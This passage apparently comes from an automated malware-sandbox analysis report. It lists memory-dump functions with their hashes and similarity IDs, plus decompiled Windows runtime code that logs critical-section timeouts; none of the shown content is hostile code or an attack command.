                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00738D14,?), ref: 0073F6FB
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction ID: 005d222395bbfb5faeeeb7da80c4fe2e7f94eaf0067cce7b80af1e999684f808
                    • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction Fuzzy Hash: 95D05E616503086AE710AAA49C07F2632886B44B40F4A0064F948962C3D964E4004165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0328967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2399832bf5a8df2b4c33733f9d29325652aaa387935d5099e359e971df2e67d1
                    • Instruction ID: de5e2ddce00f569e00a816d44df6d413073d215a05126c55390a7f50776abc8c
                    • Opcode Fuzzy Hash: 2399832bf5a8df2b4c33733f9d29325652aaa387935d5099e359e971df2e67d1
                    • Instruction Fuzzy Hash: 57B09B719124D5C5EA11E7704708737790477D0741F16C052D1020645A4778C4D1F5B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 032DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E032DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0328CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E032D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E032D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                    0x032dfdda
                    0x032dfde2
                    0x032dfde5
                    0x032dfdec
                    0x032dfdfa
                    0x032dfdff
                    0x032dfe0a
                    0x032dfe0f
                    0x032dfe17
                    0x032dfe1e
                    0x032dfe19
                    0x032dfe19
                    0x032dfe19
                    0x032dfe20
                    0x032dfe21
                    0x032dfe22
                    0x032dfe25
                    0x032dfe40

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032DFDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032DFE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032DFE01
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp Download File
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 6627668d4fb2e6dd5844ee02775650c2936968732231bd8ecaa8cf7b1096304c
                    • Instruction ID: 637bd62ffc37a31a5e435fe30695d26eedb3d3b9baebf712db7896a7a219c7d2
                    • Opcode Fuzzy Hash: 6627668d4fb2e6dd5844ee02775650c2936968732231bd8ecaa8cf7b1096304c
                    • Instruction Fuzzy Hash: 0DF0F676210301BFE6249A45DC02F23BB5AEB45730F244314F6285A5D1DAA2F8A086F4
                    Uniqueness

                    Uniqueness Score: -1.00%